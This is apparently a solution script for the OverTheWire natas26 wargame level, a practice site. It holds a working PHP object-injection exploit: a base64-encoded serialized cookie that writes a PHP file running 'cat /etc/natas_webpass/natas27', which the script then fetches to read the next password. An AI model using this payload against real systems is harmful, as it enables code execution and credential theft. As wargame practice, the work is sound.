# Import Library
import requests
import re

# Setting variables needed
username = 'natas26'
password = 'oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T'

url=f'http://{username}.natas.labs.overthewire.org/'
pw = []

# Connect to natas
session = requests.session()
response = session.get(url, auth=(username,password))

#The Cookie of 'drawing' is generated by the file 'natas26_tool.php'
session.cookies['drawing'] = "Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoyNToiaW1nL3RoaXNpc3RoZXBhc3N3b3JkLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjUwOiI8P3BocCBzeXN0ZW0oJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ=="
response = session.get(url + '?x1=43&y1=65&x2=33&y2=76', auth=(username,password))

response = session.get(url + 'img/thisisthepassword.php', auth=(username,password))
print(response.text)
